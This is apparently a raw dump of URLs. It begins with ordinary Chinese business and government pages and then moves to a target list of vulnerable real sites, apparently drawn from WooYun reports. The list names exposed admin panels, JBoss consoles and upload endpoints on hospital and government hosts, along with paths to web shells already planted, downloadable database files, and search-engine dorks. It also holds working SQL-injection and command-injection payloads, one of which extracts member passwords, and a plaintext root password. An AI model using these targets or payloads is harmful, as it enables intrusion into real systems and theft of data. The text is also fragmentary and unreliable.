http://www.zyyf520.com/ActiviDefault.aspx?id=13 http://www.shnoblift.com/products.asp?classid=4 http://www.elitimes.com/newsinfo.aspx?id=282&tid=32 http://www.hongxiajiaju.com/info.asp?id=1 http://info.wzta.gov.cn/yxwz/yxwz_list.php?type=1 http://www.lylsws.gov.cn/list.asp?cataid=7 http://www.gangchengjuyazhai.com/news/detail.asp?id=1 http://www.sxycnw.gov.cn/Bottom.aspx?sid=1 http://www.tiedong.gov.cn/newsmore.aspx?classid=1 http://www.theplace.cn/Changdzy.aspx?sid=77&suid=153 http://interact.ouhai.gov.cn/countView.jsp?id=z2jylwvj6 http://www.ycdrc.gov.cn/all/type_pws.asp?typeid=27 http://www.yichangpos.com/newshow.asp?id=100&nclass=4&classname=%D0%C2%CE%C5%D6%D0%D0%C4 http://www.chunhuizk.com/ennewsSingle.aspx?ID=1 http://www.35crmogb.com/yuangang.asp?id=1141 http://www.cqbashi.com/fwxx/showxx.asp?id=6&type=5 http://www.bjlfh.com/gp.asp?id=7 http://www.zsaohe.com/news_detail.asp?id=292 http://www.jxqfls.com/NewsView.asp?Id=97 http://www.guijinshuhuishou.com/cp_view.asp?id=722 http://lyj.wuhai.gov.cn/readnews.php?class=%E6%9E%97%E4%B8%9A%E6%A6%82%E5%86%B5&subclass=%E6%9E%97%E4%B8%9A%E5%9F%BA%E6%9C%AC%E6%83%85%E5%86%B5&sid=1 http://www.snnsf.gov.cn/xwdt/viewdetaila.asp?info_id=204 http://www.whtwolife.com/city_index.aspx?city=wuhan http://www.sclyw.gov.cn/newsview.asp?id=1694 http://www.hdlvshi.com/news.asp?bid=30 http://www.hblsj.gov.cn/InfoPublish/CategoryViewNormal.aspx?child=130&parent=129&CategoryName= http://www.cnshele.com/new_c.asp?id=80 http://fuxin-cn.com/ch/jobs.aspx?n_type=1 http://www.tjj.nbyz.gov.cn/Page/ListPage.aspx?ListID=16380&ModuleID=364 http://www.tjyqmusic.com/news-show.asp?id=274&getclass=%E4%BD%9C%E5%93%81%E6%AC%A3%E8%B5%8F&smallclass= http://www.jstysgt.com/news.asp?lt=46 http://www.yclynk.gov.cn/newsview.asp?id=158 http://www.cnsfet.com/news/main.asp?typeid=18&type=%D0%D0%D2%B5%D0%C2%CE%C5 http://www.meihuahotel.com/page.php?id=17 http://www.gdjunnuo.com/newsshow.asp?id=90 http://www.odnjx.com/cp.asp?ClassID=1 http://www.ynuxls.com/product.asp?lei=36&viewType=2 http://www.ak.gov.cn/Government/Approval/WorkItemList.aspx?categoryId=1 http://www.csjlm.com/cpshow.asp?proid=121 http://www.zjyywz.net/news_tables.aspx?new_lei=1 http://wandaedu.cn/edus.asp?lb1=12 http://www.ahtlxjjjc.gov.cn/article.php?MsgId=84285 http://www.txsifaju.gov.cn/newsInfo.asp?id=DB848A86-1889-4F99-B35E-4B46DDA59E17&menuId=BB0EF30B-1263-4B3E-901D-773ED450CC0E&menuName=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 http://www.hnwdba.com/news/shownews.php?lang=cn&id=37 http://xtzj8.com/kwd.php?id=79/ http://www.nws.gov.cn/net/xxgk/zwList.aspx?cid=87 http://www.lljcy.gov.cn/jwgk.asp?bianhao=711&Action=show http://www.gycydq.com/city_index.aspx?city=liupanshui http://www.yzagri.gov.cn/bmfw/con_detail.php?id=979 http://www.tlcz.gov.cn/Data/Data_content.aspx?trans_data_id=1813 http://www.juntongsoft.com/company.asp?id=7 http://www.under-dx.com/hiroshima/girls_search.php?newface=1&list=photo http://www.jnjiansuji.com/pro.asp?id=215&mm=%E5%BE%AE%E5%9E%8B%E6%91%86%E7%BA%BF%E5%87%8F%E9%80%9F%E6%9C%BA http://www.pznet.cn/gywm.asp?id=767 http://www.wxxiaopingji.com/city_index.aspx?city=wuxi http://fda.yantai.gov.cn/YTIICSMDH/show.jsp?id=231893 http://www.zsaqjg.gov.cn/news/news_index1.asp?typeid=1&borderid=20&thirdid=14 http://www.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.taxlapka.com/art.php?tur=1 http://www.yncyds.cn/cpzs_show.asp?cpzsid=473 http://price.hnjtzj.gov.cn/DealerPriceList.aspx?k=%e7%ae%a1%e6%9d%90 http://www.jian-she.cn/company.asp?id=1 http://www.wumingyuan.com/NewsImgList.aspx?Type=5 http://www.hxsh-market.com/rss.php?auth=0 http://www.zjzsf.com/products.asp?class1id=93 http://www.shbaokang.com/news_detail.php?post_id=117 http://hszh.yantai.gov.cn/HSZHAXHD/index_show.jsp?id=231284 http://www.lushi.gov.cn/news/news_more.asp?lm=82 http://www.bzein.gov.cn/jgsz.asp?id=8 http://www.ymzms.com/about.php?cid=10 http://www.ntkdroof.com/list.asp?id=2 http://timberbiz.com.au/calendar/default.asp?show=116 http://www.taoyiran.com/movie_show.asp?id=155 http://www.zjach.com/about.asp?tyc=146 http://www.ztda.zt.gov.cn/readinfo.aspx?B1=03c1bcd8e03f4cb0846a96e4200a2079 http://shemaleporncomics.com/shemale.php?id=admin http://www.bocaits.com/rss.php?auth=0 http://zx.kerqin.gov.cn/Players.asp?id=25 http://www.jbwjjd.gov.cn/zttj_more.asp?ztid=11 http://www.fjxhfx.com/jsp/search/searchItem.jsp?table=t168&column=Category&key=1&mode=t168&order=PubTime%20desc&flag= http://ffuzhengpz.cn/shownews.asp?id=13299 http://pnyaocai.com/bj_info.asp?id=1348 http://www.jyjj.gov.cn/jj_content_type.asp?jj_title_type=1 http://www.xggxq.gov.cn/about.asp?classID=1 http://www.shuozhousafety.gov.cn/index.php?p=danyeshow&lanmu=3 http://www.jlswb.gov.cn/zf11_news2.asp?id=23 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=6279 http://www.kmhywj.com/city_index.aspx?city=chengdu http://zwgk.cangzhou.gov.cn/article5.jsp?infoId=309094 http://www.shiyuanhuahui.com/cen_view.asp?id=422 http://www.yiwuwangluogongsi.com/disc.asp?id=1212 http://www.wlcd.gov.cn/cn/wz.asp?id=910 http://www.666kjbg.com/ShowNewView.asp?actionid=458 http://www.fangxu.net/news_view.asp?id=64 http://www.chinamagic.com/NewProductShow.asp?ID=317 http://www.laizhoupiju.com/info.asp?id=1 http://06jun.com/Products.asp?id=566 http://dgnz.dg.gov.cn/2012/shenzhen/jianghua.asp?id=1 http://www.dltjc.com/info.asp?id=1 http://www.phjk.net/huifu1.asp?id=760 http://www.wawl.gov.cn/nzcms_list_news.asp?id=590&sort_id=586 http://www.sxsjttygj.gov.cn/news_zw.asp?id=12755&classid=12&ygj=red http://www.lylsj.gov.cn/root/hyfc/ShowContent.asp?id=1255 http://www.cqwzjyxx.com/view.asp?id=296&sy=0003 http://aucma.cn/index.php?act=ls&i=6 http://www.qlcybz.com/d.asp?type=d&type2=%E5%85%AC%E5%8F%B8%E7%AE%80%E4%BB%8B http://www.qbjngo.gov.cn/content.asp?id=5 http://tjj.ninghai.gov.cn/newsview.asp?id=1067&nodecode=00020001 http://www.hl.jcy.gov.cn/medialiebiao.aspx?ID=34&mc=%e5%9b%bd%e5%ae%b6%e7%ba%a7%e5%aa%92%e4%bd%93 http://www.kunshan.travel/ks/zw/news.jsp?newsid=923&categories=5&subCategories=16&linkage=0 http://www.zhonghedianqi.com/case.asp?sid=15&id=40 http://www.labourlawyer.cn/Service.aspx?id=1 http://www.bjgx.gov.cn/job/view.php?action=company&info=frpkqqxg http://www.emmet.cn/ProductCenter/BrandCenter.aspx?bcode=EMMET http://www.tde.cn/topic/blue/index.php?ty=44 http://www.yuyongwang.net/product.jsp?bid=2 http://0431touch.com/shownews.php?id=6 http://www.ycmsbyq.com/cp.asp?classid=71 http://www.3gbaojingqi.com/gywm.asp?id=11 http://xkyl8686.com/kwd.php?id=648/ http://www.hongmutv.com/Videolist.aspx?id=2013 http://www.jsthsly.com/NewsShow.asp?id=284 http://www.szftec.gov.cn/newslist.asp?anclassid=1 http://www.wsbedu.com/chu/hua/huas3.asp?w http://iconf.bbn.com.cn http://113.5.255.119:3380/inms_3.0/login.do http://113.5.255.119:3380/jmx-console/ http://113.5.255.119:3380/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL http://113.5.255.119:4380/DNReport/system/login!login.do http://www.hnroger.com/system2/login.action http://www.jndaxxw.gov.cn/ http://www.jndaxxw.gov.cn/dangan/admin/adminlogin.asp?logout=ture http://www.jndaxxw.gov.cn/dangan/admin/admin.asp http://220.163.43.25/vwss/desktop/wssextdesktop.jsp http://220.163.43.25/vwss/desktop/wssextdesktop.jsp http://www.lppz.com/OurHome/modules/core/login.jsp http://www.evecom.net/ http://www.fzhb.gov.cn/admin/content/upload.jsp http://www.fjjsw.gov.cn/admin/content/upload.jsp http://www.fjjsw.gov.cn:8080/admin/content/upload.jsp http://www.fjsf.gov.cn:11080/fjsf/admin/content/upload.jsp http://www.fjsf.gov.cn/fjsf/admin/content/upload.jsp http://www.fjsf.gov.cn/admin/content/upload.jsp http://www.fjcoop.com:8088/admin/content/upload.jsp http://www.fjcp.com/admin/content/upload.jsp http://www.evecom.net/admin/content/upload.jsp http://*./admin/template/uploadFile.jsp http://halougo.com/halougo.com.zip http://www.elongtian.com/kehuanli/ http://ir.vancl.com/ http://zone.wooyun.org/content/5429 http://zone.wooyun.org/content/1284 http://202.111.167.54/ http://www.zswsj.gov.cn:8080/system/FunPages/DownloadFile.jsp?filePath=/system/FunPages/DownloadFile.jsp&name=DownloadFile.jsp http://www.angke.com.cn/ http://demo.angke.com.cn/ http://www.osa.com.cn/osa.zip http://bbs.hnticai.com/static/image/common/logo_hn.png/.php http://bbs.cpdyj.com/static/image/common/logo_hn.png/.php http://bbs.starlott.com/static/image/common/logo_hn.png/.php http://www.jlsi.gov.cn http://usercenter.12308.com/passenger/listPage.html USER:root PASSWORD:asdfqwer http://usercenter.12308.com/resetPwd/resetPwdByMobilePage.html http://60.161.215.7:8888/main.aspx http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3D&Encap=-1 http://xsxw.hee.cn/zhunkaozheng.aspx?bmbh=13142000036 http://rg.noi.cn/ http://www.ksepb.gov.cn/kshbmh/pages/ksepb/HjxfsqdXxList.jsp?xfbh= http://12345.sihong.gov.cn/sh12345web/ywxxtemplate/wywzlist.aspx?OUGuid= http://chezhan.12308.com/baicheng-18469.html http://www1.deyang.gov.cn//dygjj/sou.aspx?guanjz= www.lxjx.cn inurl:licenseLink.do?method= http://www.hztcm.net/service_expert_serch.php?cid=88&keywor http://bugzilla.huawei.com/CVS/Entries http://www.csc.edu.cn http://202.85.208.234:8088 http://www.wooyun.org/whitehats/%E7%98%A6%E8%9B%9F%E8%88%9E)提交的漏洞。 inurl:7001/defaultroot http://www.ahjinzhai.gov.cn:7001/defaultroot/upload/information/2014103011135554941375673.jsp http://58.20.50.94:7001/defaultroot/upload/information/2014103017374132828399603.jsp http://218.22.212.148:7001/defaultroot/upload/information/2014103019333478480357773.jsp http://222.178.221.54:7001/defaultroot/upload/information/2014103019095309431976265.jsp http://oa.hongdou.com:7001/defaultroot/upload/information/2014103019214550025117683.jsp http://www.bengbu.gov.cn:7001/defaultroot/upload/information/2014103111045738020322036.jsp http://220.179.251.131:7001/defaultroot/upload/information/2014103116063901683581994.jsp http://211.141.165.226:7001/defaultroot/upload/information/2014103116155469073216513.jsp http://oa.yundagroup.com:7001/defaultroot/upload/information/2014103116271633750509356.jsp http://211.144.121.189:7001/defaultroot/upload/information/2014103116445923450268822.jsp http://usercenter.12308.com http://218.69.100.146:8082/citywater/login/action/login!login.action http://58.63.253.21:8080/ http://58.63.253.7:8080/ http://lol.laoyuegou.com/hero/win/country/0/server/0/type/1/focus/ban/position/%28updatexml%281,concat%280x5e24,%28select%20system_user%28%29%29,0x5e24%29,1%29%29%20and%200=/time/7.html http://www.wx2h.com/web/zhb_tg_detail.php?id=355 http://wdcx.yundasys.com:81/yd_wd/ inurl:hotelvouchergta.asp?orderid= http://211.137.32.194/index.html http://202.96.103.54/index.html http://14.17.100.56:8001/Login.aspx http://www.qdzjj.gov.cn/download.php?path=download.php http://www.tiens.com/manage/后台直接弱口令。admin http://www.hzzglxs.com/ http://www.meiduly.cn http://www.qzflly.com http://www.mzl66.com/ http://www.ywsdlxs.com http://www.anjitour.cn/ http://www.zjlyjp.com http://www.hzkyly.com/ http://www.hangzhou-travel.com.cn http://www.hzqst.com/ http://www.cnjct.com/ http://www.0570u.com http://www.klx365.com/ http://www.hdts.cn/ http://www.ykly.com.cn http://www.xiao6.cn http://www.lxtxcn.com http://www.0738u.com http://tour.hnfggl.com http://www.fangzhoutour.com http://www.huaxiats.net http://www.feifanly.com/ http://www.86778011.com http://www.hylxs.com.cn/ http://www.jhdt.cn http://www.razl0577.com/ http://www.zgjqzj.com/ http://tour.lantuw.com http://www.mlzjr.com http://www.yycq.net/ http://www.83188678.com http://tour.tzyouhao.com http://www.88811555.com.cn http://www.zjjsbf.com http://www.zhongqiaolvyou.com http://www.98333.com.cn http://www.zjyxgl.com http://www.nxwh.net/ http://xxxx//sys/treeXml.jsp?Si06=1&type=sort ID:www.wooyun.org/bugs/wooyun-2014-075853 3.test.ssap.com.cn/admin/CEC_Login.htm www.babytree.com http://121.207.243.132:8001/web/login http://cc.yundasys.com:8080/cassets/main.jsp佳克实物资产全生命周期的数据分析管理软件 inurl:cmpPlay.aspx?movieID http://tz9158.com/5/cmpPlay.aspx?movieID=1fe67b6f-41f8-407c-891a-8efdc6 http://www.sqlmap.org http://host/cmis40/photo/PictureFOS.a?pid= http://j.scedu.com.cn/list_v.php?sid=01 http://www.dyk.com.cn/promotion/index?type=89 http://www.7jia2.com/index.php?app=search&cate_id=9235&spec_2=8%20and%201%20=%202%20union%20all%20SELECT%201,hex%28load_file%28char%2847,97,108,105,100,97,116,97,47,119,119,119,47,119,119,119,114,111,111,116,47,115,112,116,109,97,108,108,47,100,97,116,97,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112%29%29%29,3,4,5,6,7%20FROM%20lym_ext_spec%20es http://119.167.223.86:6688/Webstate/WebSquery/search0s.asp?pid=0&did=s URL:http://www.dyk.com.cn/search?q=K3&t=1 http://219.142.55.69:8080/400sys/index.jsp http://cba.gov.cn/cbastats/media/wcbateam.aspx?startshift=1&teamno=WTe001&endshift=1 http://www.hs-express.cn/OldZzfw.aspx?BillNo=s http://www.jiaji.com/ac01.aspx?id=1 http://www.joust.net.cn/searchNo.aspx?NO=s http://www.lark.gov.cn/System/sys0_inc_voteresult.asp?VoteID=3 http://deshi.ougz.com.cn/skills/login.do?portalId=A&siteKey=0 http://218.5.64.214:8090/Entrance/ShipPackApp.aspx http://m.wanhui.cn/index-w1000292/ https://passport.wanhui.cn/m/account/forgetpassword/step1/?redirect=http%3A%2F%2Fm.wanhui.cn%2Fmine%2F%3Fwpid%3D1000292&wpid=1000292 http://movie.js118114.com:80/Movie/Ticket_Compare.aspx?&fid=001101332014&pid=10wml http://bianlun.7k7k.com/comment.php?action=GetContent&site=pk&aid=NSFTW'&type=1&order=1&num=10&sn=3&tid=1&t=1414811274819 http://218.22.39.88:8081/yzmisfw/csoft/login.action http://www.ctis.cn/lwlk/user/userLogin.action http://www.haitiansoft.com:8080/ http://211.139.80.193/ http://211.139.80.194:8080/bmdp/ http://222.187.199.60/bjxsxx.asp http://jwxt.tzpc.edu.cn/bjxsxx.asp http://jwgl.jhu.cn/bjxsxx.asp http://jwc.jljtxy.com.cn/bjxsxx.asp http://jwcx.czie.net/bjxsxx.asp http://180.209.64.10/bjxsxx.asp http://szitu.cn:86/bjxsxx.asp http://bugreport.autohome.com.cn/ http://bugreport.autohome.com.cn/nagios/ http://bugreport.autohome.com.cn/nagiosql/ http://www.tzsw.cn/ http://www.tzsw.cn/wzjs.aspx?newstypeid=25,选择医院 http://www.sxdqyy.com/ http://www.sxdqyy.com/Admin/Index.aspx http://www.tz2y.cn/Admin/Index.aspx http://www.tzmh.com/Admin/Index.aspx http://www.wlsph.com/Admin/Index.aspx http://www.ls-hospital.com/Admin/Index.aspx http://www.312000.net/Admin/Index.aspx http://www.2113515.com.cn/Admin/Index.aspx http://www.sxdqyy.com/Admin/Index.aspx http://www.dywsyy.com/Admin/Index.aspx http://www.pjyy.cn/Admin/Index.aspx http://www.qzhospital.com/Admin/Index.aspx http://www.tzlqey.com/Admin/Index.aspx http://www.lhzyy.com/Admin/Index.aspx http://www.lhsfby.com/Admin/Index.aspx http://www.wlzyy.com/Admin/Index.aspx http://www.wlfby.com/Admin/Index.aspx http://www.wldfyy.com/Admin/Index.aspx http://www.yh2y.com/Admin/Index.aspx http://www.yhrmyy.cn/Admin/Index.aspx http://www.yhzyy.com.cn/Admin/Index.aspx http://www.zjsmyy.com/Admin/Index.aspx http://www.ttrmyy.com/Admin/Index.aspx http://www.xjrmyy.com.cn/Admin/Index.aspx http://www.xjfby.cn/Admin/Index.aspx http://www.tzzsgsyy.com/Admin/Index.aspx http://www.hy3y.com/Admin/Index.aspx http://www.wlyy.cn:8000/Admin/Index.aspx www.xxoo.com http://www.xxoo.com http://passport.8684.com/8684/ajax.php?cmd=get_city http://glz.dgpt.edu.cn/user/reg.asp http://glz.dgpt.edu.cn/admin/ http://glz.dgpt.edu.cn/admin/TempletEdit.asp?Action=Add&Dir=/templets http://glz.dgpt.edu.cn/templets/Untitled.asp;.html http://at.db.766.com/ http://at.db.766.com/search.php?wp=16 https://account.chsi.com.cn/account/preregister.action?from=chsi-home http://www.haitiansoft.com:8080/ http://oa.tjfsu.edu.cn/losepassword.asp http://vos.tjufe.edu.cn/losepassword.asp http://www.shhjwl.com/vos/losepassword.asp http://www.cnshuiyu.com/losepassword.asp http://www.fzsyxx.com/oa/losepassword.asp http://211.68.250.42/losepassword.asp http://211.68.192.21/losepassword.asp http://121.30.226.44/losepassword.asp http://116.228.82.237/losepassword.asp http://180.166.7.94/losepassword.asp http://211.68.250.42/losepassword.asp http://180.166.7.94/losepassword.asp http://116.228.82.237/losepassword.asp http://121.30.226.44/losepassword.asp http://cose-sz.seu.edu.cn/它的后台网址是http://cose-sz.seu.edu.cn/admin/manager/Com_index.action http://www.cometbbs.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://www.wooyun.org/bugs/wooyun-2014-081643/trace/4396818394b9b59fdfdd9a1da75a1883 http://mail.12333sb.com/ http://mail.12333sb.com/login.php1 http://210.75.222.58:8080/ http://210.75.222.58:8080/foot.jsp http://www.cmce.zju.edu.cn/这个站用的是Discuz http://www.cmee.zju.edu.cn/utility/convert/data/config.inc.php http://60.161.215.7:8888/Login.aspx http://www.001studio.com/ http://www.caifujiu.com/admin/ http://www.manqiulatex.com/admin/ http://www.bjzhunxing.com/admin/ http://www.hzjinwei.com/admin/ http://www.mic-deutschland.de/admin/ http://www.001studio.com/case.html http://fjportal.vcomlive.com/ http://fjportal.vcomlive.com/play/play.php?id=LBQG1120572 http://www.hcwsxx.gov.cn/voteaaa/Admin/Index.asp http://www.enet.com.cn/elady/star/inforcenter/star.jsp http://www.jeanswest.com/imgview2.asp http://news.07073.com/zixun/1.txt https://github.com/acailiu/walrus/blob/b8a527cb9d0f0a66a6cdbe69d15469a063df44ed/walrus/pylib/pymail.py https://mm.tencent.com https://github.com/andyylzhang/work_proj/blob/fa573eb17eb1131a982a0ded5d54f7ced7ee48f1/py_sendmail/sendmail_with_tables.py https://mm.tencent.com https://github.com/acailiu/walrus/blob/b8a527cb9d0f0a66a6cdbe69d15469a063df44ed/walrus/pylib/pymail.py https://mm.tencent.com http://indunet.net.cn/technology/data!tech.action?gotourl=/technology/techlist.jsp&itype=1 http:/m.yy.com/ http://zzcx.scujjedu.cn:114 cn:114 http://zzcx.scujjedu.cn:114 http://fish.unilbs.com/ShipUserManager/UserLogin.aspx http://219.142.87.93/ http://www.spacechina.com/ VERSION:1.2.3 http://www.kuaikuai.cn/ http://www.wandaperformance.com/ http://www.wandaperformance.com/user.do?parameter=password http://60.10.8.78/ http://www.bzfcj.gov.cn:9081/Templets/BoZhou/aspx/buildctrl.aspx?buildcode=129583011811069 http://www.ahbzfdc.com/Templets/BoZhou/aspx/buildctrl.aspx?buildcode=12402842741001 http://www.hcsfcglj.com/Templets/BoZhou/aspx/buildctrl.aspx?BuildCode=13715232691001 http://www.mcfcj.cn/Templets/BoZhou/aspx/buildctrl.aspx?buildcode=13137180041051 http://www.zyfcj.com/Templets/BoZhou/outside/buildctrl.aspx?BuildCode=ZY14020087418 http://www.bzfcj.gov.cn:9081/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=13794713971468 http://www.hcsfcglj.com/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=13805055391010 http://www.mcfcj.cn/Templ http://zyfcj.com/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=091d9563-b83b-45f6-bfbf-f6f63c8e1237 http://www.lxfgj.com/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=14M6YsFXu0Y= http://work.hebei.com.cn:9001/pub/services/NbCmsServer?wsdl http://www.yichemall.com/Order/Detail?orderId=1 google:https://www.sssis.com/search?newwindow=1&safe=active&biw=1440&bih=711&q=site%3Aelong.com+inurl%3A博彩&oq=site%3Aelong.com+inurl%3A博彩&gs_l=serp.3...2917.6630.0.6693.4.4.0.0.0.0.172.515.0j3.3.0.msedrc...0...1c.1j4.57.serp..4.0.0.UESks6CvLC4 http://user.nipic.com/memberinfo/password http://**.**.**.**/article/listAll.php?cid=6 inurl:zcfg_read.asp?id= http://www.yichemall.com/ http://www.yichemall.com/User/ForgotPassword http://officemsg.focus.cn www.gxi.gov.cn http://cyxmk.hbjyj.gov.cn/details.php?id=86 http://dwzwgk.shitai.gov.cn/include/web_content.php?id=1901 http://dyzzf.gov.cn/member/info_news.php?fid=1291淮北市段园镇人民政府网站 http://english.qqhr.gov.cn/xinwen.php?id=210 http://fs.aqcz.gov.cn/show.php?id=205 http://v5op.apk.gfan.com/index.action server:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib http://java.sun.com/ http://51auto.mop.com/hclist_/ http://lianhua.xmedu.cn/Login!singleSysChkLogin.do http://www.xmhmxx.com/Login!singleSysChkLogin.do http://27.154.224.94:6060/Login!singleSysChkLogin.do http://218.5.65.158/Login!singleSysChkLogin.do http://www.net137.cn/product.asp http://www.twsgg.com/feedback.asp http://www.czhsbwg.com/guest.asp http://www.czwjjp.com/baoming.asp http://www.elmhome.com/guest.asp http://www.czzzhyxh.com/feedback.asp http://www.ai-machi.com/ckfinder/ckfinder.html http://www.ai-machi.com/upload/files/1.asp/2014112154426.jpg http://www.czqjcc.com/ckfinder/ckfinder.html http://www.czqjcc.com/upload/files/1.asp/2014112163059.jpg http://www.elmhome.com/ckfinder/ckfinder.html http://www.elmhome.com/upload/files/1.asp/2014112163918.jpg http://www.mmission.cn/ckfinder/ckfinder.html http://www.mmission.cn/upload/files/1.asp/201411215460.jpg php:138 php:138 http://www.wooyun.org/bugs/wooyun-2014-081663/trace/1b8eeea3b409c968cea424fa0c26d2db http://www.wooyun.org/bugs/wooyun-2014-081643/trace/4396818394b9b59fdfdd9a1da75a1883 http://www.tzyuanlin.com/admin/database/HDEWeb.mdb http://www.tztengrong.com/admin/database/HDEWeb.mdb http://www.xinhulaw.com/admin/database/HDEWeb.mdb http://www.tzyiming.com/admin/database/HDEWeb.mdb http://www.tzyuanlin.com/admin/ http://www.tzzy.gov.cn/admin/ http://tzjz.com.cn/admin/ http://www.wooyun.org/bugs/wooyun-2014-081663/trace/1b8eeea3b409c968cea424fa0c26d2db http://networkbuilders.intel.com/endusers/index.php?option=com_spfiles&task=shortingData http://www.bitcar.com http://dsa.bitcar.com/fckeditor/ http://dsa.bitcar.com/pink.aspx http://www.bitcar.com/pink.txt http://fm.zju.edu.cn/。该网站是浙江大学计算机学院本科生教学用的一个网站,里面包含了几十门计算机专业课程的资料和学生信息,同时该网站也是一个在线教学平台,学生可以提交作业,老师可以批改,注册学生人数超过5000。由于用户名就是学生的学号,此漏洞极易被利用进行一些撞库攻击。 http://fm.zju.edu.cn/editProfile.php line-height:30px padding-top:10px http://59.151.102.53/ http://59.151.102.53:8080 http://59.151.102.53/i.bitauto.com/20120131/ http://xxxx/opac/recommend/recommendBookList/list http://net-training.chinasarft.gov.cn/ http://net-training.chinasarft.gov.cn/jsp/sites/site?action=messagelist&pageaction=query&type=15000 http://shop.taikang.com/rockmongo/index.php http://wooyun.org/bugs/wooyun-2014-076483 http://wooyun.org/bugs/wooyun-2014-076480 http://mail.chinaexpressair.com http://yy.tv/ http://yy.tv/index.php?m=Video&do=gameProfileList&gid=7 http://14.17.109.4:8002/ http://14.17.109.44/ganglia/ http://14.17.108.40:8080/ http://183.60.218.160:8080/index.html http://www.gtggjy.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=20D5FBB324C6B1C07D31ACD808398A9D http://www.qfztb.gov.cn/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=91091DB0617ABC565E1218BDC6103337 http://www.zjhnztb.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=6816F8EBEB828E332009E7A19981B0B5 http://www.jszbw.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=D7E9393FD55D8720697B5B960F6ED3B2 http://www.smztb.com.cn/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=4E343211AA26FFE27D4916381ABD9DA7 http://www.jsspzx.gov.cn/JsWeb/NewsManager/NewsAttFileDownload.do?fileGuid=BBFD40FDC9AA23B9125271AF56C2FBA8 http://www.jxedzsp.gov.cn/jxkfqglxt/NewsManager/NewsAttFileDownload.do?fileGuid=E9EB9C8E042A5A68F71E6E86868D06AD http://122.226.154.126/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=DA7C22A193C779CE73C1DCCD67ED76D8 http://www.wecrm.com/ http://www.wecrm.com/static/consumer/ http://www.baidu.com/s?wd=%E5%8D%8E%E6%80%9D%E9%80%9A%E7%BD%91%E7%BB%9C%E4%BC%9A%E8%AE%AE&pn=0&oq=%E5%8D%8E%E6%80%9D%E9%80%9A%E7%BD%91%E7%BB%9C%E4%BC%9A%E8%AE%AE&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_spt=1&issp=1&f=8&rsv_bp=0 http://meetinglive.teleuc.com/index.do?siteBrand=meetinglive http://bgifx.teleuc.com/index.do?siteBrand=meetinglive http://pop136.teleuc.com/index.do?siteBrand=meetinglive http://kuniyasu.teleuc.com/index.do?siteBrand=meetinglive http://jkec.teleuc.com/index.do?siteBrand=meetinglive http://dcmfx.teleuc.com/index.do?siteBrand=meetinglive http://pthl.teleuc.com/index.do?siteBrand=meetinglive http://cuconline.teleuc.com/index.do?siteBrand=meetinglive http://gzosta.teleuc.com/index.do?siteBrand=meetinglive http://semia.teleuc.com/index.do?siteBrand=meetinglive http://demo.74cms.com/jobs/jobs-list.php?sort=wage&page=1&jobcategory=&education=&citycategory=&experience=&settr=3&trade=&wage=&nature= http://law.szu.edu.cn/Works_Article.asp?ClassCode=00030007&ArticleID=2051 http://law.szu.edu.cn/Window.asp?ClassCode=00090001 http://law.szu.edu.cn/new.asp?ClassCode=00020001 http://api.ucar.cn/CarSourceInterface/ForJson/dealerCarSourceForJson.ashx?count=10&cityid=2530&callback=brand_callback&_=1343004348578&pids=10012 http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc&key= http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc%27&key= error:SELECT http://**.**.**/proc/woopasswd/index.phptype=des&do=decrypt&keyword=789%3Becho%20%22wooyun%20test%22 http://sqlmap.org http://www.dfem.com.cn//ddglts/admin_z/ http://www.dfem.com.cn//ddglts/uploadfile/201411030347334944.php;gif http://portuguese.dfem.com.cn/?p=admin https://software.intel.com/en-us/user/login http://gdtj.chinasarft.gov.cn/wszb/map/000000.aspx http://vip.kankan.com/sftp-config.json http://itcloud.bingocc.cc/ http://www.skynj.com/) inurl:homepages/content_page.aspx http://58.213.129.206:8080/jytweb/homepages/webusr_list_page.aspx http://58.222.184.133/tzxyweb/homepages/webusr_list_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/homepages/webusr_list_page.aspx http://58.222.216.220/ggxygkweb/homepages/webusr_list_page.aspx http://58.222.202.135:82/homepages/webusr_list_page.aspx http://xygk.jingjiang.gov.cn/homepages/webusr_list_page.aspx http://58.222.212.114:82/txfgxyweb/homepages/webusr_list_page.aspx http://58.222.195.110:8081/jyxyweb/homepages/webusr_list_page.aspx http://58.222.212.114:82/txgtxyweb/homepages/webusr_list_page.aspx http://58.222.211.21/xhgtxyweb/homepages/webusr_list_page.aspx http://61.178.185.50/tzweb/homepages/webusr_list_page.aspx http://www.dtxzfw.com/homepages/webusr_list_page.aspx http://www.jseic.gov.cn:8081/jxwweb/homepages/webusr_list_page.aspx http://58.213.129.206:8080/jytweb/homepages/webusr_list_page.aspx http://58.222.184.133/tzxyweb/homepages/webusr_list_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/homepages/webusr_list_page.aspx http://58.222.202.135:82/homepages/webusr_list_page.aspx http://58.222.216.220/ggxygkweb/homepages/webusr_list_page.aspx 